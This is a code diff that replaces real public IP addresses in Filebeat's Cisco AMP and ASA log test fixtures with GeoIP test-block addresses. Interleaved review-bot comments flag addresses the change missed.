 "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2547,7 +2547,7 @@
 "host.hostname": "Demo_AMP_MAP_FriedEx",
 "host.name": "Demo_AMP_MAP_FriedEx",
 "input.type": "log",
- "log.offset": 53662,
+ "log.offset": 53872,
 "process.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0",
 "related.hash": [
 "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"
@@ -2557,7 +2557,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2571,7 +2571,7 @@
 "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2606,7 +2606,7 @@
 "host.hostname": "Demo_AMP_MAP_FriedEx",
 "host.name": "Demo_AMP_MAP_FriedEx",
 "input.type": "log",
- "log.offset": 55441,
+ "log.offset": 55656,
 "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536",
 "related.hash": [
 "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"
@@ -2616,7 +2616,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2630,7 +2630,7 @@
 "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2665,7 +2665,7 @@
 "host.hostname": "Demo_Command_Line_Arguments_Kovter",
 "host.name": "Demo_Command_Line_Arguments_Kovter",
 "input.type": "log",
- "log.offset": 57151,
+ "log.offset": 57371,
 "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff",
 "related.hash": [
 "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"
@@ -2675,7 +2675,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2689,7 +2689,7 @@
 "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2724,7 +2724,7 @@
 "host.hostname": "Demo_Command_Line_Arguments_Kovter",
 "host.name": "Demo_Command_Line_Arguments_Kovter",
 "input.type": "log",
- "log.offset": 58928,
+ "log.offset": 59153,
 "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff",
 "related.hash": [
 "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"
@@ -2734,7 +2734,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2746,7 +2746,7 @@
 "@timestamp": "2021-01-14T10:33:46.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2780,7 +2780,7 @@
 "host.hostname": "Demo_Qakbot_1",
 "host.name": "Demo_Qakbot_1",
 "input.type": "log",
- "log.offset": 60601,
+ "log.offset": 60831,
 "related.hash": [
 "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
 ],
@@ -2789,7 +2789,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2801,7 +2801,7 @@
 "@timestamp": "2021-01-14T10:33:46.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2833,7 +2833,7 @@
 "host.hostname": "Demo_Qakbot_1",
 "host.name": "Demo_Qakbot_1",
 "input.type": "log",
- "log.offset": 61802,
+ "log.offset": 62037,
 "related.hash": [
 "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
 ],
@@ -2842,7 +2842,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log
index 75271900c573..42ffa8a85d77 100644
--- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log
+++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log
@@ -1,38 +1,38 @@
-May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)
-May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)
-May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3
+May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (175.16.199.1/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)
+May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (175.16.199.1/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)
+May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 3
 May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00
 May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2
-May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1
-May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111)
+May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 1
+May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (175.16.199.1/111) to fw111:192.168.2.2/111 (8.8.5.4/111)
 May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)
 May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67
 May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log
 May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4
-May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872.
-May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0
+May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 175.16.199.1/10872.
+May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 175.16.199.1/2 laddr 10.10.10.10/2 type 8 code 0
 May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10
 May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00
-May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0
-May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3
+May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 10.192.46.90/0
+May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 3
 May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I
-May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839)
+May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (175.16.199.1/80) to net:10.10.10.10/54839 (175.16.199.1/54839)
 May 5 18:29:32 dev01: %ASA-6-305012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00
 May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session
 May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006
 May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111
 May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:192.186.2.2/53356 duration 0:02:04 bytes 64585
-May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)
-May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)
+May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (175.16.199.1/22638)
+May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (175.16.199.1/22638)
 May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group "out1111_access_out" [0x47e21ef4, 0x47e21ef4]
 May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111
 May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111
 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111
 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111
 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111
-May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)
-May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)
-May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)
+May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (175.16.199.1/10051)
+May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (175.16.199.1/10051)
+May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (175.16.199.1/10051)
 May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner
 May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow
 May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief
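Review bot: The address sanitization in this hunk is incomplete: `8.8.8.8` is replaced, but the NAT-side addresses `8.8.5.4`, `8.8.8.4` and `8.8.8.5` on the %FTD-6-302013/302015/805001, %ASA-2-302015 and %ASA-6-302022 lines are still real, routable addresses, and so is `192.186.2.2` on the unchanged %ASA-2-302016 line (which reads like a typo of the 192.168.2.2 used on every neighbouring line). If the intent is a fixture that never refers to a third party and whose geo/AS enrichment does not depend on which GeoIP database the test run has, those should move to the same reserved/test blocks this change already introduces, for example `... to net:192.168.2.2/53356 duration 0:02:04 bytes 64585` for the 302016 line, with the expected-output offsets regenerated. I am assuming the new addresses were picked from a GeoIP test database; confirm that before choosing the replacements so the golden file stays stable.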
@@ -40,10 +40,10 @@ May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list
 May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -> fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]
 May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -> fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]
 May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner
-May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8)
+May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (175.16.199.1)
 May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985
 May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout
-May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123)
+May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (175.16.199.1/123)
 May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)
 May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063
 May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2
@@ -52,7 +52,7 @@ Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http:
 Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]
 Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23
 Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/
-Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout
+Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.143/54242 to server.deflan:67.43.156.12/9101 duration 1:00:02 bytes 245 Connection timeout
 Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group "global_access_1"
 Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -> OUTSIDE/195.122.12.242(53) hit-cnt 1 first hit [0x16847359, 0x00000000]
 Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK
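Review bot: The two rewritten lines in this hunk (%ASA-6-302026 and %ASA-6-302024) replace only the second mapped address and leave `8.8.8.5`, a routable address, in the first parenthesised position, so the sanitization is half done on the very lines being touched. If the goal is to keep every real-world address out of the fixture, both positions should use addresses from the reserved/test blocks the change introduces elsewhere. The 302024 line also carries an unbalanced `(8.8.8.5(19051)` that predates this change; if it is a deliberate malformed-input case, a comment in the module's test notes saying so would save the next reader from "fixing" it.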
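Review bot: The %ASA-5-106100 context line in this hunk still ends with `OUTSIDE/195.122.12.242(53)`, a routable address that the rewrite of the neighbouring %ASA-6-302304 line (1.2.3.4 / 2.3.4.5 replaced) did not cover. For consistency with the rest of this change it should be moved into the same test blocks, e.g. `-> OUTSIDE/67.43.156.14(53)`, and the expected output regenerated since that event carries the address in `destination.ip`/`related.ip`. I am inferring the enrichment behaviour from the expected-json hunks further down; confirm against the module pipeline.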
@@ -62,31 +62,31 @@ Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD
 Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin
 Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user "admin"
 Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin
-Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d
-Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested
+Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.143, IP = 81.2.69.143, Security negotiation complete for LAN-to-LAN Group (81.2.69.143) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d
+Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.143, Username = 81.2.69.143, IP = 81.2.69.143, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested
 Apr 27 02:03:03 dev01: %ASA-4-722051: Group User IP <192.168.50.3> IPv4 Address <192.168.50.5> IPv6 address <::> assigned to session
-Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.
+Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 175.16.199.1 WebVPN session terminated: User Requested.
 Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.
-Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23
-Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally
-Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514
-Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412
-Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number
-Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created.
-Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted.
-Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request
-Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database
-Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)
-Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet.
-Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
+Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 67.43.156.13/6370 to outside:195.74.114.34/23
+Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.143/8888 to destinationInterfaceName:192.168.2.2/123123 locally
+Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:67.43.156.15/8888 to destinationInterfaceName:192.168.2.2/514514
+Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.143/7777 to 192.168.2.2/123412
+Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.143/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number
+Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.143 and 192.168.2.2 (user= admin) has been created.
+Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.143 and 192.168.2.2 (user= admin) has been deleted.
+Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.143:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request
+Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.143:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database
+Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 67.43.156.12, PHASE 2 COMPLETED (msgid=bbe383e88)
+Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 1.128.3.4, Duplicate first packet detected. Ignoring packet.
+Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 67.43.156.12, All IPSec SA proposals found unacceptable!
 Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!
-Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
+Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 67.43.156.12, All IPSec SA proposals found unacceptable!
 Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!
-Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
-Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 100.60.140.10, Username = test_user, IP = 1.2.3.4, Security negotiation complete for User (test_user) Responder, Inbound SPI = 0x0000000, Outbound SPI = 0x0000000
+Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 67.43.156.12, All IPSec SA proposals found unacceptable!
+Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 100.60.140.10, Username = test_user, IP = 81.2.69.143, Security negotiation complete for User (test_user) Responder, Inbound SPI = 0x0000000, Outbound SPI = 0x0000000
 Apr 27 2020 02:03:03 dev01: %ASA-4-106023: Deny protocol 47 src outside:100.66.124.24 dst inside:172.31.98.44 by access-group "inbound"
-Apr 27 2020 02:03:03 dev01: %ASA-4-106023: Deny icmp src OUTSIDE:2a05:d016:add:4002:91f2:a9b2:e09a:6fc6 dst OUTSIDE:fe00:afa0::1 (type 128, code 0) by access-group "OUTSIDE_in"
-Apr 27 2020 02:03:03 dev01: %ASA-4-302016: Teardown UDP connection 123364823 for OUTSIDE:82.0.0.1/500 to identity:85.0.0.1/500 duration 92:24:20 bytes 4671944
+Apr 27 2020 02:03:03 dev01: %ASA-4-106023: Deny icmp src OUTSIDE:2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dst OUTSIDE:fe00:afa0::1 (type 128, code 0) by access-group "OUTSIDE_in"
+Apr 27 2020 02:03:03 dev01: %ASA-4-302016: Teardown UDP connection 123364823 for OUTSIDE:67.43.156.13/500 to identity:1.128.3.4/500 duration 92:24:20 bytes 4671944
 May 5 19:02:25 dev01: %ASA-4-733100: [ Scanning] drop rate-2 exceeded. Current burst rate is 0 per second, max configured rate is 8; Current average rate is 5 per second, max configured rate is 4; Cumulative total count is 19269
 May 5 19:02:25 dev01: %ASA-4-733100: [ 192.168.0.1] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is 10; Current average rate is 5 per second, max configured rate is 5; Cumulative total count is 6018
 May 5 19:02:25 dev01: %ASA-4-733100: [ Port-5432 5432] drop rate-1 exceeded. Current burst rate is 8 per second, max configured rate is 10; Current average rate is 20 per second, max configured rate is 5; Cumulative total count is 12466
diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json
index 28b937e6bdff..ca9623da72a6 100644
--- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json
+++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json
